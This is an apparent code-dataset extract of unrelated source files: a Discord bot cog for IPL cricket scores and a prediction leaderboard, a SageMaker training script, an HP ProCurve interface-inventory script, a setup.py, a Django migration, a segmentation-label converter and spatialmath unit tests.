        The "_2" entries are False when only a single IPL match was played
        (or is scheduled) on that day.  When there were two matches, the
        pair is swapped so the first element is the later match.
        """
        # Fetch matches from website
        params = {"apikey": self.apikey}
        async with self.session.get(self.api_matches, params = params) as response:
            data = await response.json()

        # Details about the last match
        last_match = []
        # Details about the todays match
        next_match = []
        for match in data["matches"]:
            # IPL 2021 match ids start with 12540; keep only yesterday's matches
            if (str(match["unique_id"])[:-2] == "12540"
                    and match["date"][:10] == str(date.today() - timedelta(days = 1))):
                # date.today() - timedelta(days = 1) yields yesterday's date
                last_match.append(match)
            # If date is todays date
            if (str(match["unique_id"])[:-2] == "12540"
                    and match["date"][:10] == str(date.today())):
                next_match.append(match)

        # On normal days, there should be only one last match and second match should be False.
        # NOTE(review): raises IndexError when no IPL match was played yesterday — confirm
        # callers only run during the season.
        last_match_details = last_match[0]
        last_match_details_2 = False
        # However when there were two matches yesterday, add it to last match details 2
        if (len(last_match) > 1):
            last_match_details_2 = last_match[1]
            # Invert the last match and second last match
            last_match_details, last_match_details_2 = last_match_details_2, last_match_details

        # Similarly make details of next match also
        next_match_details = next_match[0]
        next_match_details_2 = False
        if (len(next_match) > 1):
            next_match_details_2 = next_match[1]
            # Invert again
            next_match_details, next_match_details_2 = next_match_details_2, next_match_details

        # Return the details
        return (last_match_details, last_match_details_2, next_match_details, next_match_details_2)

    @commands.command()
    async def ipl(self, ctx):
        """Get info about last match and upcoming matches"""
        # BUGFIX: fetch_matches is a coroutine and must be awaited; without
        # the await the tuple-unpacking below fails at runtime.
        last_match_details, last_match_details_2, \
            next_match_details, next_match_details_2 = await self.fetch_matches()

        embed = discord.Embed(
            color = 0x25dbf4, # Blue
            title = "Matches"
        )
        embed.add_field(
            name = "Next Match",
            value = f'{next_match_details["team-1"]} \nvs \n{next_match_details["team-2"]}',
            inline = False
        )
        # If there is a second match on that day
        if (next_match_details_2 != False):
            embed.add_field(
                name = "Match 2",
                value = f'{next_match_details_2["team-1"]} \nvs \n{next_match_details_2["team-2"]}',
                inline = False
            )
        embed.add_field(
            name = "Last Match",
            value = f'{last_match_details["team-1"]} \nvs \n{last_match_details["team-2"]}',
            inline = True
        )
        embed.add_field(
            name = "Winner",
            value = f'{last_match_details["winner_team"]}',
            inline = True
        )
        image_url = self.image_url[last_match_details["winner_team"]]
        # If there was another match yesterday
        if (last_match_details_2 != False):
            embed.add_field(
                name = "Match 2",
                value = f'{last_match_details_2["team-1"]} \nvs \n{last_match_details_2["team-2"]}',
                inline = False
            )
            embed.add_field(
                name = "Winner",
                value = f'{last_match_details_2["winner_team"]}',
                inline = True
            )
            # Update the image to show
            image_url = self.image_url[last_match_details_2["winner_team"]]
        embed.set_image(url = image_url)
        embed.set_thumbnail(url = self.ipl_logo)
        await ctx.send(embed = embed)

    async def fetch_score(self, match_details):
        """Build the live-score embed for *match_details* (or a doggo embed
        when the match has not started)."""
        # Set up params
        params = {"apikey": self.apikey, "unique_id": match_details["unique_id"]}
        async with self.session.get(self.api_score, params = params) as response:
            data = await response.json()

        # If the First Match too hasn't started
        if (data["matchStarted"] == False):
            # Send a cute dog image/gif
            dog_api = "https://api.thedogapi.com/v1/images/search"
            async with self.session.get(dog_api) as response:
                response_dog = await response.json()
            response_dog = response_dog[0]
            embed = discord.Embed(
                title = "Bruh...",
                color = 0xea1010 # Red
            )
            embed.add_field(
                name = "The match has not even started yet 🤦♂️",
                value = "Wait till the match starts? Anyway here is a cute doggo ❤"
            )
            embed.set_image(url = response_dog["url"])
            return embed

        # Differentiate between the first team and the second team.
        # The API score string looks like "<score A> v <score B>"; a trailing
        # "*" marks the innings currently in progress.
        index_v = data["score"].find("v")
        if (data["score"][-1] != "*"):
            current_batting = data["team-1"]
        else:
            current_batting = data["team-2"]
        embed = discord.Embed(
            title = "Live Score",
            color = 0x25dbf4, # Blue
        )
        embed.add_field(
            name = "Team A",
            value = data["score"][:index_v],
            inline = False
        )
        embed.add_field(
            name = "Team B",
            value = data["score"][index_v + 1:],
            inline = False
        )
        embed.set_image(url = self.image_url[current_batting])
        embed.set_thumbnail(url = self.ipl_logo)
        return embed

    @commands.command()
    async def score(self, ctx):
        """See live score"""
        await ctx.trigger_typing()
        *_, next_match_details, next_match_details_2 = await self.fetch_matches()
        # BUGFIX: default to the first match of the day so match_details is
        # always defined; use the second match only when it exists and has
        # actually started.
        match_details = next_match_details
        if (next_match_details_2 != False
                and next_match_details_2["matchStarted"] != False):
            match_details = next_match_details_2
        embed = await self.fetch_score(match_details)
        await ctx.send(embed = embed)

    async def fetch_standings(self):
        """Build the Sattebaaz Championship leaderboard embed."""
        # Fetch standings from the database, highest points first
        self.cursor.execute("SELECT * FROM STANDINGS ORDER BY points DESC")
        data = self.cursor.fetchall()
        current_standings = {}
        for user in data:
            # user = (user_id, points)
            # Fetch username
            user_info = self.bot.get_user(user[0])
            username = user_info.name
            # Make a dictionary of the form {username: points}
            current_standings[username] = user[1]
        leaderboard = [user for user in current_standings]
        embed = discord.Embed(
            title = "Current Standings",
            color = 0x07f223
        )
        embed.set_thumbnail(url = self.ipl_logo)
        emojies = ["🥇", "🥈", "🥉", "4️⃣", "5️⃣", "6️⃣", "7️⃣", "8️⃣", "9️⃣", "🔟"]
        # Add fields to the embed
        for index in range(len(leaderboard)):
            embed.add_field(
                name = f"{emojies[index]} {leaderboard[index]}",
                value = f"Points: {current_standings[leaderboard[index]]}",
                inline = False
            )
        return embed

    @commands.command()
    async def standings(self, ctx):
        """Get current standings of Sattebaaz Championship"""
        embed = await self.fetch_standings()
        await ctx.send(embed = embed)

    # Following are all owner only commands

    async def predict_code(self, match_details):
        """Post a prediction embed for *match_details* and return its message id."""
        # Predictions channel
        channel = self.bot.get_channel(756701639544668160)
        embed = discord.Embed(
            color = 0x19f0e2, # Cyan
            title = "Sattebaaz Championship",
        )
        embed.add_field(
            name = "Who do you think will win today's match?",
            value = f':regional_indicator_a: {match_details["team-1"]}\n:regional_indicator_b: {match_details["team-2"]}'
        )
        embed.set_thumbnail(url = self.ipl_logo)
        last_embed = await channel.send(embed = embed)
        await last_embed.add_reaction("🇦")
        await last_embed.add_reaction("🇧")
        return (last_embed.id)

    @commands.is_owner()
    @commands.command(hidden = True)
    async def predict(self, ctx):
        """Owner only: post today's prediction embed(s) and store their ids."""
        *_, next_match_details, next_match_details_2 = await self.fetch_matches()
        channel = self.bot.get_channel(756701639544668160)
        allowed_mentions = discord.AllowedMentions(everyone = True)
        await channel.send(content = "@everyone", allowed_mentions = allowed_mentions)
        embed_id = await self.predict_code(next_match_details)
        # Update database: only the current day's embed ids are kept
        self.cursor.execute("DELETE FROM predict")
        query = """INSERT INTO predict VALUES
            ({})""".format(embed_id)
        self.cursor.execute(query)
        self.dbcon.commit()
        # If there is a second match on that day
        if (next_match_details_2 != False):
            embed_id = await self.predict_code(next_match_details_2)
            # Update database
            query = """INSERT INTO predict VALUES
                ({})""".format(embed_id)
            self.cursor.execute(query)
            self.dbcon.commit()

    async def update_points(self, match_details, embed_id):
        """Award 10 points to everyone who predicted the winning team of
        *match_details* on the prediction message *embed_id*.

        Returns the list of winning user ids.
        """
        # Get members details
        self.cursor.execute("SELECT * FROM standings")
        users = self.cursor.fetchall()

        # Get user ids of all members who reacted for each team
        channel = self.bot.get_channel(756701639544668160)
        last_embed = await channel.fetch_message(embed_id)
        team_1 = []
        team_2 = []
        for reaction in last_embed.reactions:
            async for user in reaction.users():
                if (reaction.emoji == "🇦" and not user.bot):
                    team_1.append(user.id)
                elif (reaction.emoji == "🇧" and not user.bot):
                    team_2.append(user.id)

        # Get winners
        if (match_details["winner_team"] == match_details["team-1"]):
            winners = team_1
        else:
            winners = team_2

        # Update points
        for i in range(len(users)):
            user = users[i]
            if (user[0] in winners):
                # First convert tuple into list
                user = list(user)
                user[1] += 10
                # Update main list
                users[i] = tuple(user)

        # Update database
        self.cursor.execute("DELETE FROM standings")
        self.dbcon.commit()
        for user in users:
            self.cursor.execute("INSERT INTO standings VALUES {}".format(user))
            self.dbcon.commit()
        return winners

    async def show_points(self):
        """Update points for yesterday's match(es) and build the winners embed."""
        # Get last match's details
        last_match_details, last_match_details_2, *_ = await self.fetch_matches()

        # Get last embed id(s)
        self.cursor.execute("SELECT * FROM predict")
        data = self.cursor.fetchall()
        embed_id = data[0][0]

        winners = await self.update_points(last_match_details, embed_id)
        # Resolve winner ids to User objects for display
        for i in range(len(winners)):
            user = self.bot.get_user(winners[i])
            winners[i] = user

        # If there was another match yesterday
        if (last_match_details_2 != False):
            embed_id = data[1][0]
            second_winners = await self.update_points(last_match_details_2, embed_id)
            # BUGFIX: resolve the second match's winner ids to User objects too;
            # previously they stayed raw ids and were never shown.
            for i in range(len(second_winners)):
                second_winners[i] = self.bot.get_user(second_winners[i])

        embed = discord.Embed(
            color = 0x07f223, # Green
            title = "Sattebaaz Championship",
        )
        embed.add_field(
            name = "Last match was won by ...",
            value = last_match_details["winner_team"],
            inline = True
        )
        embed.add_field(
            name = "Winning sattebaaz",
            value = "`{}`".format("\n".join(
                (winner.name + "#" + winner.discriminator) for winner in winners)),
            inline = False
        )
        # Add another field if there was another match yesterday
        if (last_match_details_2 != False):
            embed.add_field(
                name = "Second match was won by ...",
                value = last_match_details_2["winner_team"],
                inline = True
            )
            embed.add_field(
                name = "Winning sattebaaz",
                # BUGFIX: use second_winners (was mistakenly `winners`)
                value = "`{}`".format("\n".join(
                    (winner.name + "#" + winner.discriminator) for winner in second_winners)),
                inline = False
            )
        embed.set_image(url = self.image_url[last_match_details["winner_team"]])
        embed.set_thumbnail(url = self.ipl_logo)
        return embed

    @commands.is_owner()
    @commands.command(hidden = True)
    async def points(self, ctx):
        """Update points and show winners of last prediction(s)"""
        embed = await self.show_points()
        await ctx.send(embed = embed)
training/script.py | aws-samples/sagemaker-processing-reading-data-from-redshift-to-sagemaker-pipelines | 1 | 12762218 | <reponame>aws-samples/sagemaker-processing-reading-data-from-redshift-to-sagemaker-pipelines
import argparse
import joblib
import os
import pandas as pd
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error as mse
#### USED FOR PREDICTION ####
def model_fn(model_dir):
    """Load the persisted sklearn model from *model_dir* (SageMaker hook)."""
    model_path = os.path.join(model_dir, 'model.joblib')
    return joblib.load(model_path)
if __name__ == "__main__":
    # Command-line configuration: input/output locations for the SageMaker
    # train/test channels and the model output directory.
    parser = argparse.ArgumentParser()
    parser.add_argument('--train_path', type=str, default='/opt/ml/input/data/train/')
    parser.add_argument('--train_file', type=str, default='train.csv')
    parser.add_argument('--test_path', type=str, default='/opt/ml/input/data/test/')
    parser.add_argument('--test_file', type=str, default='test.csv')
    parser.add_argument('--output_path', type=str, default='/opt/ml/model/')
    args = parser.parse_args()

    # Load the train/test CSVs and split off the target column.
    print("Loading the files ...")
    train_df = pd.read_csv(os.path.join(args.train_path, args.train_file))
    test_df = pd.read_csv(os.path.join(args.test_path, args.test_file))
    X_train, y_train = train_df.drop('total_sold', axis=1), train_df.total_sold
    X_test, y_test = test_df.drop('total_sold', axis=1), test_df.total_sold

    # Fit a random forest regressor on the training split.
    print("Training the model ...")
    model = RandomForestRegressor()
    model.fit(X_train, y_train)

    # Report held-out mean squared error.
    print("Evaluating performances ... ")
    score = mse(y_test, model.predict(X_test))
    print(f"MSE: {score}")

    # Persist the fitted model where SageMaker expects it.
    print("Saving the model ...")
    joblib.dump(model, os.path.join(args.output_path, 'model.joblib'))
| 2.6875 | 3 |
sa/profiles/HP/ProCurve/get_interfaces.py | prorevizor/noc | 84 | 12762219 | <filename>sa/profiles/HP/ProCurve/get_interfaces.py
# ---------------------------------------------------------------------
# HP.ProCurve.get_interfaces
# ---------------------------------------------------------------------
# Copyright (C) 2007-2016 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinterfaces import IGetInterfaces
from noc.core.ip import IPv4
class Script(BaseScript):
    """HP.ProCurve interface inventory script.

    Builds the IGetInterfaces result by walking interface MIB columns via
    the CLI ``walkMIB`` command, then enriching each interface with data
    from ``show ip``, OSPF status, portchannel membership and switchport
    configuration.
    """

    name = "HP.ProCurve.get_interfaces"
    interface = IGetInterfaces

    # IANAifType value -> NOC interface type
    iftypes = {
        "6": "physical",
        "161": "aggregated",
        "54": "aggregated",
        "53": "SVI",
        "24": "loopback",
    }
    # MIB column name -> interface attribute name
    objstr = {
        "ifName": "name",
        "ifDescr": "description",
        "ifPhysAddress": "mac",
        "ifType": "type",
        "ifAdminStatus": "admin_status",
        "ifOperStatus": "oper_status",
    }
    # Matches "show ip" rows: "<iface> | Manual|Disabled <ip> <mask>".
    # FIX: the first octet separator of the mask was an unescaped "." that
    # matched any character; it is now a literal dot like the others.
    rx_ip = re.compile(
        r"\s+(?P<name>\S+)\s+\|\s+(Manual|Disabled)\s"
        r"+(?P<ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s"
        r"+(?P<mask>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
    )

    def execute(self):
        iface = {}
        interfaces = []
        step = len(self.objstr)
        # One line per (MIB column, ifindex); grouped in chunks of `step`
        # rows describing a single interface.
        lines = self.cli("walkMIB " + " ".join(self.objstr)).split("\n")[:-1]
        sh_ip = self.cli("show ip")
        try:
            sh_ospf = self.cli("show ip ospf interface")
        except Exception:
            sh_ospf = False
        portchannel_members = {}  # member -> (portchannel, type)
        for pc in self.scripts.get_portchannel():
            i = pc["interface"]
            t = pc["type"] == "L"
            for m in pc["members"]:
                portchannel_members[m] = (i, t)
        switchports = {}
        vlans = self.scripts.get_vlans()
        if vlans:
            for sp in self.scripts.get_switchport():
                switchports[sp["interface"]] = (
                    sp["untagged"] if "untagged" in sp else None,
                    sp["tagged"],
                )
        i = 0
        # FIX: renamed the loop variables `str` and `l`, which shadowed the
        # builtin `str` (and then called `str.split` on it); behavior is
        # unchanged, including the use of the chunk's last row for ifindex.
        for _ in range(len(lines) // step):
            for row in lines[i : i + step]:
                leaf = row.split(".")[0]
                val = row.split("=")[1].lstrip()
                if leaf == "ifPhysAddress":
                    if not val:
                        continue
                    iface[self.objstr[leaf]] = val.rstrip().replace(" ", ":")
                elif leaf == "ifType":
                    iface[self.objstr[leaf]] = self.iftypes[val]
                elif leaf[-6:] == "Status":
                    # ifAdminStatus/ifOperStatus: "1" means up
                    iface[self.objstr[leaf]] = val == "1"
                else:
                    iface[self.objstr[leaf]] = val
            ifname = iface["name"]
            sub = iface.copy()
            # `row` still holds the last row of this chunk; all rows of the
            # chunk share the same ifindex suffix.
            ifindex = row.split("=")[0].split(".")[1].rstrip()
            iface["snmp_ifindex"] = int(ifindex)
            sub["snmp_ifindex"] = int(ifindex)
            sub["enabled_afi"] = []
            del sub["type"]
            for ip_line in sh_ip.split("\n"):
                match = self.rx_ip.search(ip_line)
                if match:
                    if match.group("name") == sub["name"]:
                        sub["enabled_afi"] += ["IPv4"]
                        sub["ipv4_addresses"] = [
                            IPv4(match.group("ip"), netmask=match.group("mask")).prefix
                        ]
                        if sh_ospf:
                            for ospf_line in sh_ospf.split("\n"):
                                if ospf_line.split():
                                    if ospf_line.split()[0] == match.group("ip"):
                                        sub["is_ospf"] = True
            if ifname in switchports and ifname not in portchannel_members:
                sub["enabled_afi"] += ["BRIDGE"]
                u, t = switchports[ifname]
                if u:
                    sub["untagged_vlan"] = u
                if t:
                    sub["tagged_vlans"] = t
            iface["subinterfaces"] = [sub]
            interfaces += [iface]
            iface = {}
            i = i + step
        return [{"interfaces": interfaces}]
| 1.96875 | 2 |
setup.py | mediawiki-utilities/python-mwevents | 1 | 12762220 | import os
from distutils.core import setup
from setuptools import find_packages, setup
def read(fname):
    """Return the text contents of *fname*, resolved relative to this file's
    directory.

    Fix: the file handle was previously leaked (``open(...).read()``); it is
    now closed via a context manager, and UTF-8 is used explicitly.
    """
    path = os.path.join(os.path.dirname(__file__), fname)
    with open(path, encoding="utf-8") as f:
        return f.read()
def requirements(fname):
    """Yield each stripped line of *fname*, resolved relative to this file's
    directory.

    Fix: the file handle was previously never closed; the generator now
    releases it when iteration finishes (or the generator is closed).
    """
    path = os.path.join(os.path.dirname(__file__), fname)
    with open(path, encoding="utf-8") as f:
        for line in f:
            yield line.strip()
# Package metadata for mwevents; VERSION / LICENSE / README.rst are read
# from files next to this setup.py.
setup(
    name='mwevents',
    version=read('VERSION').strip(),
    author='<NAME>',
    author_email='<EMAIL>',
    packages=find_packages(),
    scripts=[],
    url='http://pypi.python.org/pypi/mwevents',
    # NOTE(review): unlike read(), LICENSE is opened relative to the CWD and
    # the handle is never closed — consider read('LICENSE') instead.
    license=open('LICENSE').read(),
    description='Standardized public MediaWiki events for tools and Science.',
    long_description=read('README.rst'),
    install_requires=[
        'phpserialize',
        'mediawiki-utilities',
        'jsonable'
    ],
    test_suite='nose.collector',
    classifiers=[
        "Development Status :: 4 - Beta",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Environment :: Other Environment",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Topic :: Text Processing :: General",
        "Topic :: Utilities",
        "Topic :: Scientific/Engineering"
    ],
)
| 1.539063 | 2 |
stream/migrations/0003_auto_20201025_1206.py | WarwickAnimeSoc/aniMango | 0 | 12762221 | # Generated by Django 2.2.13 on 2020-10-25 12:06
from django.db import migrations, models
# Auto-generated migration: constrain View.token to a unique 20-char field.
class Migration(migrations.Migration):

    dependencies = [
        ('stream', '0002_viewcounter_name'),
    ]

    operations = [
        migrations.AlterField(
            model_name='view',
            name='token',
            # unique=True lets a view be looked up directly by its token
            field=models.CharField(max_length=20, unique=True),
        ),
    ]
| 1.523438 | 2 |
tools/convert_datasets/rain_filtering_labels.py | kencan7749/mmsegmentation | 0 | 12762222 | <filename>tools/convert_datasets/rain_filtering_labels.py
import mmcv
import matplotlib.pyplot as plt
import numpy as np
import os
import sys
from PIL import Image
from tqdm import tqdm
def create_mmseg_labels(label_root_dir, label_list, image_list, save_root_dir):
    """
    Create and save label maps for mmsegmentation.

    For every file name in *image_list*, the per-sensor binary masks found
    under ``label_root_dir/<label>/`` are combined by :func:`create_label`
    into a single class-index image (values 0..num_classes-1), which is then
    written to *save_root_dir* as a palettized ('P' mode) PNG.

    Arguments:
        label_root_dir: path to the directory containing the label image directories
        label_list: which label (sensor) directories to combine
        image_list: file names to process
        save_root_dir: directory where the combined label images are saved
    """
    for fname in tqdm(image_list):
        combined = create_label(label_root_dir, label_list, fname)
        out_img = Image.fromarray(combined.astype(np.uint8))
        out_img.save(os.path.join(save_root_dir, fname), mode='P')
    print('done')
def create_label(label_root_dir, label_list, img_file):
    """
    Combine per-sensor binary masks into one class-index label map.

    Each mask under ``label_root_dir/<label>/img_file`` has pixel values of
    0 or 255 in all three channels; it is normalised to {0, 1} and then the
    masks are summed with weights 1, 2, ... so that for the rain_filtering
    dataset the result encodes:
        0 ... none, 1 ... first sensor only, 2 ... last sensor only,
        3 ... both sensors.

    Arguments:
        label_root_dir: path to the directory containing the label image directories
        label_list: which label (sensor) directories to combine
        img_file: image file name to load from each label directory

    Return:
        np.ndarray of image shape with values in 0..num_classes-1
    """
    masks = []
    for label_name in label_list:
        # Load as float32; pixels are either 0 or 255 in every channel.
        mask = mmcv.imread(os.path.join(label_root_dir, label_name, img_file)).astype(np.float32)
        mask /= 255
        # Collapse channels: (H, W, 3) -> (H, W), then undo the x3 from summing.
        mask = mask.sum(2)
        mask /= 3
        masks.append(mask)
    # Weighted sum: mask i contributes value (i + 1) where it is set.
    combined = np.zeros_like(mask)
    for idx, m in enumerate(masks, start=1):
        combined += m * idx
    return combined
if __name__ == '__main__':
    # Please adjust the paths below for your setup; CLI args would be better.
    label_root_dir = '/var/datasets/rain_filtering/particle_labels/train'
    save_root_dir = '/var/datasets/rain_filtering/ann_dir/train'
    os.makedirs(save_root_dir, exist_ok=True)

    # Sensor sub-directories whose masks are combined into one label map.
    label_list = ['first', 'last']
    # Process every image present in the first sensor's directory.
    image_list = np.sort(os.listdir(os.path.join(label_root_dir, label_list[0])))

    create_mmseg_labels(label_root_dir, label_list, image_list, save_root_dir)
| 3.09375 | 3 |
tests/base/test_transformsNd.py | mfkenson/spatialmath-python | 1 | 12762223 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 10 14:19:04 2020
@author: corkep
"""
import numpy as np
import numpy.testing as nt
import unittest
from math import pi
import math
from scipy.linalg import logm, expm
from spatialmath.base.transformsNd import *
from spatialmath.base.transforms3d import trotx, transl, rotx, isrot, ishom
from spatialmath.base.transforms2d import trot2, transl2, rot2, isrot2, ishom2
from spatialmath.base import sym
import matplotlib.pyplot as plt
class TestND(unittest.TestCase):
def test_iseye(self):
self.assertTrue(iseye(np.eye(1)))
self.assertTrue(iseye(np.eye(2)))
self.assertTrue(iseye(np.eye(3)))
self.assertTrue(iseye(np.eye(5)))
self.assertFalse(iseye(2 * np.eye(3)))
self.assertFalse(iseye(-np.eye(3)))
self.assertFalse(iseye(np.array([[1, 0, 0], [0, 1, 0]])))
self.assertFalse(iseye(np.array([1, 0, 0])))
def test_r2t(self):
# 3D
R = rotx(0.3)
T = r2t(R)
nt.assert_array_almost_equal(T[0:3,3], np.r_[0,0,0])
nt.assert_array_almost_equal(T[:3,:3], R)
theta = sym.symbol('theta')
R = rotx(theta)
T = r2t(R)
self.assertEqual(r2t(R).dtype, 'O')
nt.assert_array_almost_equal(T[0:3,3], np.r_[0,0,0])
# nt.assert_array_almost_equal(T[:3,:3], R)
self.assertTrue((T[:3,:3] == R).all())
# 2D
R = rot2(0.3)
T = r2t(R)
nt.assert_array_almost_equal(T[0:2,2], np.r_[0,0])
nt.assert_array_almost_equal(T[:2,:2], R)
theta = sym.symbol('theta')
R = rot2(theta)
T = r2t(R)
self.assertEqual(r2t(R).dtype, 'O')
nt.assert_array_almost_equal(T[0:2,2], np.r_[0,0])
nt.assert_array_almost_equal(T[:2,:2], R)
with self.assertRaises(ValueError):
r2t(3)
with self.assertRaises(ValueError):
r2t(np.eye(3,4))
def test_t2r(self):
# 3D
t=[1,2,3]
T = trotx(0.3, t=t)
R = t2r(T)
nt.assert_array_almost_equal(T[:3,:3], R)
nt.assert_array_almost_equal(transl(T), np.array(t))
# 2D
t=[1,2]
T = trot2(0.3, t=t)
R = t2r(T)
nt.assert_array_almost_equal(T[:2,:2], R)
nt.assert_array_almost_equal(transl2(T), np.array(t))
with self.assertRaises(ValueError):
t2r(3)
with self.assertRaises(ValueError):
r2t(np.eye(3,4))
def test_rt2tr(self):
# 3D
R = rotx(0.2)
t = [3, 4, 5]
T = rt2tr(R, t)
nt.assert_array_almost_equal(t2r(T), R)
nt.assert_array_almost_equal(transl(T), np.array(t))
theta = sym.symbol('theta')
R = rotx(theta)
self.assertEqual(r2t(R).dtype, 'O')
# 2D
R = rot2(0.2)
t = [3, 4]
T = rt2tr(R, t)
nt.assert_array_almost_equal(t2r(T), R)
nt.assert_array_almost_equal(transl2(T), np.array(t))
theta = sym.symbol('theta')
R = rot2(theta)
self.assertEqual(r2t(R).dtype, 'O')
with self.assertRaises(ValueError):
rt2tr(3, 4)
with self.assertRaises(ValueError):
rt2tr(np.eye(3,4), [1,2,3,4])
def test_tr2rt(self):
# 3D
T = trotx(0.3, t=[1,2,3])
R, t = tr2rt(T)
nt.assert_array_almost_equal(T[:3,:3], R)
nt.assert_array_almost_equal(T[:3,3], t)
# 2D
T = trot2(0.3, t=[1,2])
R, t = tr2rt(T)
nt.assert_array_almost_equal(T[:2,:2], R)
nt.assert_array_almost_equal(T[:2,2], t)
with self.assertRaises(ValueError):
R, t = tr2rt(3)
with self.assertRaises(ValueError):
R, t = tr2rt(np.eye(3,4))
def test_checks(self):
# 3D case, with rotation matrix
R = np.eye(3)
self.assertTrue(isR(R))
self.assertFalse(isrot2(R))
self.assertTrue(isrot(R))
self.assertFalse(ishom(R))
self.assertTrue(ishom2(R))
self.assertFalse(isrot2(R, True))
self.assertTrue(isrot(R, True))
self.assertFalse(ishom(R, True))
self.assertTrue(ishom2(R, True))
# 3D case, invalid rotation matrix
R = np.eye(3)
R[0, 1] = 2
self.assertFalse(isR(R))
self.assertFalse(isrot2(R))
self.assertTrue(isrot(R))
self.assertFalse(ishom(R))
self.assertTrue(ishom2(R))
self.assertFalse(isrot2(R, True))
self.assertFalse(isrot(R, True))
self.assertFalse(ishom(R, True))
self.assertFalse(ishom2(R, True))
# 3D case, with rotation matrix
T = np.array([[1, 0, 0, 3], [0, 1, 0, 4], [0, 0, 1, 5], [0, 0, 0, 1]])
self.assertFalse(isR(T))
self.assertFalse(isrot2(T))
self.assertFalse(isrot(T))
self.assertTrue(ishom(T))
self.assertFalse(ishom2(T))
self.assertFalse(isrot2(T, True))
self.assertFalse(isrot(T, True))
self.assertTrue(ishom(T, True))
self.assertFalse(ishom2(T, True))
# 3D case, invalid rotation matrix
T = np.array([[1, 0, 0, 3], [0, 1, 1, 4], [0, 0, 1, 5], [0, 0, 0, 1]])
self.assertFalse(isR(T))
self.assertFalse(isrot2(T))
self.assertFalse(isrot(T))
self.assertTrue(ishom(T),)
self.assertFalse(ishom2(T))
self.assertFalse(isrot2(T, True))
self.assertFalse(isrot(T, True))
self.assertFalse(ishom(T, True))
self.assertFalse(ishom2(T, True))
# 3D case, invalid bottom row
T = np.array([[1, 0, 0, 3], [0, 1, 1, 4], [0, 0, 1, 5], [9, 0, 0, 1]])
self.assertFalse(isR(T))
self.assertFalse(isrot2(T))
self.assertFalse(isrot(T))
self.assertTrue(ishom(T))
self.assertFalse(ishom2(T))
self.assertFalse(isrot2(T, True))
self.assertFalse(isrot(T, True))
self.assertFalse(ishom(T, True))
self.assertFalse(ishom2(T, True))
# skew matrices
S = np.array([
[0, 2],
[-2, 0]])
nt.assert_equal(isskew(S), True)
S[0, 0] = 1
nt.assert_equal(isskew(S), False)
S = np.array([
[0, -3, 2],
[3, 0, -1],
[-2, 1, 0]])
nt.assert_equal(isskew(S), True)
S[0, 0] = 1
nt.assert_equal(isskew(S), False)
def test_homog(self):
nt.assert_almost_equal(e2h([1, 2, 3]), np.c_[1, 2, 3, 1].T)
nt.assert_almost_equal(h2e([2, 4, 6, 2]), np.c_[1, 2, 3].T)
def test_homtrans(self):
#3D
T = trotx(pi/2, t=[1,2,3])
v = [10,12,14]
v2 = homtrans(T, v)
nt.assert_almost_equal(v2, np.c_[11, -12, 15].T)
v = np.c_[[10,12,14], [-3,-4,-5]]
v2 = homtrans(T, v)
nt.assert_almost_equal(v2, np.c_[[11, -12, 15], [-2,7,-1]])
#2D
T = trot2(pi/2, t=[1,2])
v = [10,12]
v2 = homtrans(T, v)
nt.assert_almost_equal(v2, np.c_[-11, 12].T)
v = np.c_[[10,12], [-3,-4]]
v2 = homtrans(T, v)
nt.assert_almost_equal(v2, np.c_[[-11, 12], [5, -1]])
with self.assertRaises(ValueError):
T = trotx(pi/2, t=[1,2,3])
v = [10,12]
v2 = homtrans(T, v)
def test_skew(self):
# 3D
sk = skew([1, 2, 3])
self.assertEqual(sk.shape, (3,3))
nt.assert_almost_equal(sk + sk.T, np.zeros((3,3)))
self.assertEqual(sk[2,1], 1)
self.assertEqual(sk[0,2], 2)
self.assertEqual(sk[1,0], 3)
nt.assert_almost_equal(sk.diagonal(), np.r_[0,0,0])
# 2D
sk = skew([1])
self.assertEqual(sk.shape, (2,2))
nt.assert_almost_equal(sk + sk.T, np.zeros((2,2)))
self.assertEqual(sk[1,0], 1)
nt.assert_almost_equal(sk.diagonal(), np.r_[0,0])
with self.assertRaises(ValueError):
sk = skew([1,2])
def test_vex(self):
# 3D
t = [3, 4, 5]
sk = skew(t)
nt.assert_almost_equal(vex(sk), t)
# 2D
t = [3]
sk = skew(t)
nt.assert_almost_equal(vex(sk), t)
def test_isskew(self):
t = [3, 4, 5]
sk = skew(t)
self.assertTrue(isskew(sk))
sk[0,0] = 3
self.assertFalse(isskew(sk))
# 2D
t = [3]
sk = skew(t)
self.assertTrue(isskew(sk))
sk[0,0] = 3
self.assertFalse(isskew(sk))
def test_isskewa(self):
# 3D
t = [3, 4, 5, 6, 7, 8]
sk = skewa(t)
self.assertTrue(isskewa(sk))
sk[0,0] = 3
self.assertFalse(isskew(sk))
sk = skewa(t)
sk[3,3] = 3
self.assertFalse(isskew(sk))
# 2D
t = [3, 4, 5]
sk = skew(t)
self.assertTrue(isskew(sk))
sk[0,0] = 3
self.assertFalse(isskew(sk))
sk = skewa(t)
sk[2,2] = 3
self.assertFalse(isskew(sk))
def test_skewa(self):
# 3D
sk = skewa([1, 2, 3, 4, 5, 6])
self.assertEqual(sk.shape, (4,4))
nt.assert_almost_equal(sk.diagonal(), np.r_[0,0,0,0])
nt.assert_almost_equal(sk[-1,:], np.r_[0,0,0,0])
nt.assert_almost_equal(sk[:3,3], [1, 2, 3])
nt.assert_almost_equal(vex(sk[:3,:3]), [4,5,6])
# 2D
sk = skewa([1, 2, 3])
self.assertEqual(sk.shape, (3,3))
nt.assert_almost_equal(sk.diagonal(), np.r_[0,0,0])
nt.assert_almost_equal(sk[-1,:], np.r_[0,0,0])
nt.assert_almost_equal(sk[:2,2], [1, 2])
nt.assert_almost_equal(vex(sk[:2,:2]), [3])
with self.assertRaises(ValueError):
sk = skew([1,2])
def test_vexa(self):
# 3D
t = [1, 2, 3, 4, 5, 6]
sk = skewa(t)
nt.assert_almost_equal(vexa(sk), t)
# 2D
t = [1, 2, 3]
sk = skewa(t)
nt.assert_almost_equal(vexa(sk), t)
def test_det(self):
a = np.array([[1, 2], [3, 4]])
